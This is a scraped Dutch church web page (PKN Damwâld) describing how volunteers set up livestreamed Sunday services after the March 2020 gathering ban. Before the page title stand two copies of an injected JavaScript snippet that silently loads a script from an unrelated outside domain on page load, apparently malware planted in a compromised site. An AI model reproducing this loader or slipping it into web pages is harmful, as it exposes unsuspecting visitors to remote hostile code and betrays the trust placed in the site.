;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Livestream pkndamwald.nl - PKN Damwâld

Livestream pkndamwald.nl

Gepubliceerd op: maandag 4 mei 2020

Zoals u ongetwijfeld heeft ervaren hebben de genomen maatregelen  een behoorlijke invloed op veel aspecten van ons leven. Zo ook op de beleving van de kerkdiensten op zondag. Ook de technische verzorging van de diensten heeft een flinke verandering doorgemaakt. Op een doorsnee zondag zit er één beameraar in de kerk. Dat is nu wel anders: er zijn minimaal vier personen aanwezig om de technische installatie draaiende te houden.
We nemen u even een paar weken mee terug. Op donderdag 12 maart werden alle bijeenkomsten van meer dan 100 personen verboden. Diezelfde avond zijn we in overleg gegaan over de invulling van de diensten. Er werd besloten dat we de diensten met beeld wilden gaan streamen. Zoals u weet kunt u de diensten volgen via de website van de kerk: www.pkndamwald.nl/live. Donderdagavond, vrijdag en de halve zaterdag waren we met een man of vijf in de kerk bezig met testen, zodat we de morgendienst op zondag via internet konden uitzenden. En het is gelukt!
Na die eerste dienst is er nog menig vrij uur besteed aan het doorvoeren van verbeteringen. We hebben de technische installatie verder uitgebreid, zodat we met meerdere camera’s kunnen opnemen. Daarnaast is er een mengtafel toegevoegd, zodat we het geluid zo optimaal mogelijk kunnen laten klinken. Het heeft veel tijd en inspanning gekost, maar we kunnen inmiddels zeggen dat we het goed onder de knie hebben. Op dit moment zijn we het team enigszins aan het uitbreiden, zodat we eventuele ziekte of andere afwezigheid kunnen opvangen. Door een mooie samenwerking tussen technici van zowel de Hervormde als de Gereformeerde gemeente, hopen we dat we op deze manier de komende diensten zo goed mogelijk bij u thuis kunnen brengen.
Vanuit verschillende hoeken van de gemeenten hebben we positieve berichten mogen ontvangen. Het is mooi dat we op deze manier de kerk bij u thuis kunnen brengen. We hopen dat we in betere tijden elkaar weer mogen ontmoeten in de kerkbanken.